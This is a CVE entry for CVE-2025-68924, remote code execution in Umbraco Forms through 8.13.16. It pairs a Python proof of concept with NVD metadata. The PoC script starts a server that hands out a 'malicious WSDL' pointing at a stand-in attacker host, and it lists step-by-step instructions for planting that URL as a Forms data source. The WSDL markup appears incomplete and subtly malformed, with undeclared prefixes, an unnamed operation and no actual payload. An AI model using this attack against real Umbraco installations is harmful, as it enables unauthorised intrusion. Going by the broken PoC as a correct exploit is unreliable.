CVE-2025-68924

# CVE-2025-68924 PoC - Malicious WSDL for Umbraco Forms RCE # This PoC demonstrates the vulnerability concept import http.server import socketserver import threading MALICIOUS_WSDL = '''<?xml version="1.0" encoding="UTF-8"?> <definitions name="MaliciousService" targetNamespace="http://evil.example.com/" xmlns="http://schemas.xmlsoap.org/wsdl/"> <types> <xsd:schema targetNamespace="http://evil.example.com/"> <xsd:element name="ExecuteCommand"> <xsd:complexType> <xsd:sequence> <xsd:element name="cmd" type="xsd:string"/> </xsd:sequence> </xsd:complexType> </xsd:element> </xsd:schema> </types> <message name="CmdInput"> <part name="body" element="tns:ExecuteCommand"/> </message> <portType name="MaliciousPort"> <operation name="Execute"> <input message="tns:CmdInput"/> </operation> </portType> <binding name="MaliciousBinding" type="tns:MaliciousPort"> <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/> <operation> <soap:operation soapAction="execute"/> <input><soap:body use="literal"/></input> </operation> </binding> <service name="MaliciousService"> <port name="MaliciousPort" binding="tns:MaliciousBinding"> <soap:address location="http://attacker-server:8080/evil"/> </port> </service> </definitions>''' class WSDLSHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): if 'wsdl' in self.path: self.send_response(200) self.send_header('Content-type', 'text/xml') self.end_headers() self.wfile.write(MALICIOUS_WSDL.encode()) else: self.send_response(404) self.end_headers() def log_message(self, format, *args): pass def start_malicious_server(port=8080): with socketserver.TCPServer(('', port), WSDLSHandler) as httpd: httpd.serve_forever() # Attack steps: # 1. Start the malicious WSDL server # 2. Authenticate to Umbraco CMS # 3. Navigate to Umbraco Forms > Data Sources # 4. Create new data source with type 'Web Service' # 5. Set WSDL URL to: http://attacker-server:8080/evil?wsdl # 6. Save and trigger data source # 7. Command execution occurs during WSDL parsing

{"cve": {"id": "CVE-2025-68924", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:18.370", "lastModified": "2026-02-20T19:51:46.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "In Umbraco UmbracoForms through 8.13.16, an authenticated attacker can supply a malicious WSDL (aka Webservice) URL as a data source for remote code execution."}, {"lang": "es", "value": "En Umbraco UmbracoForms hasta 8.13.16, un atacante autenticado puede proporcionar una URL WSDL maliciosa (también conocida como Webservice) como fuente de datos para ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:umbraco:umbraco_forms:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.13.16", "matchCriteriaId": "C726ED30-8A49-486F-B544-A73CB54C1C62"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-vrgw-pc9c-qrrc", "source": "[email protected]", "tags": ["VDB Entry", "Vendor Advisory", "Mitigation"]}, {"url": "https://our.umbraco.com/packages/developer-tools/umbraco-forms/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nuget.org/packages/UmbracoForms", "source": "[email protected]", "tags": ["Product"]}]}}